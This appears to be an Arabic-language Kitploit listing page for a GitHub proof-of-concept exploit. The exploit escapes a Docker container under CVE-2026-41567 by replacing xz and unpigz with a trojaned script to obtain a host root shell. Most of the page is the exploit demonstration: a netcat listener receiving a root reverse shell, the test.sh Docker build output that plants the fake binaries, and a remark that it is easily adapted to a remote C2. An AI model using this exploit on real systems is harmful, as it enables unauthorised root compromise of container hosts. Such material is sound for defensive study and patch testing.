Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41567 — يستغل ثغرة CVE-2026-41567 للهروب من Docker باستخدام ثنائيات xz/unpigz المزروعة بحصان طروادة للحصول على shell بصلاحيات root على المضيف من داخل حاوية. | Kitploit
أدوات/GitHubGitHub/berdav/cve-2026-41567
تحليل الثغرات الأمنيةالاستغلالالهروب من الحاوية
GitHubberdav/cve-2026-41567

CVE-2026-41567

يستغل ثغرة CVE-2026-41567 للهروب من Docker باستخدام ثنائيات xz/unpigz المزروعة بحصان طروادة للحصول على shell بصلاحيات root على المضيف من داخل حاوية.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41567 1day

استغلال ليوم واحد للهروب من Docker عبر CVE-2026-41567.

إنه عرض توضيحي للهروب من Docker باستخدام ثنائيات xz / unpigz موطّنة.

يمكن تعديله بسهولة لاستخدامه عن بُعد (أي فقط عدّل عنوان IP الافتراضي لـ Docker مع C2 عن بُعد).

مزيد من المعلومات حول الاستغلال هنا

PoC

شغّل netcat للاستماع على المنفذ 50005 على المضيف

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp  50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit

ثم نفّذ سكربت test.sh. إذا كان الاستغلال يعمل، ستحصل على قشرة جذر (root) فورًا.

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  19.97kB
Step 1/7 : FROM debian
 ---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
 ---> Using cache
 ---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
 ---> Using cache
 ---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
 ---> Using cache
 ---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
 ---> Using cache
 ---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
 ---> Using cache
 ---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
 ---> Using cache
 ---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp

لاحظ أنك تحتاج إلى صلاحيات للتواصل مع خادم Docker (عادةً بكونك root).

تنزيل الأداة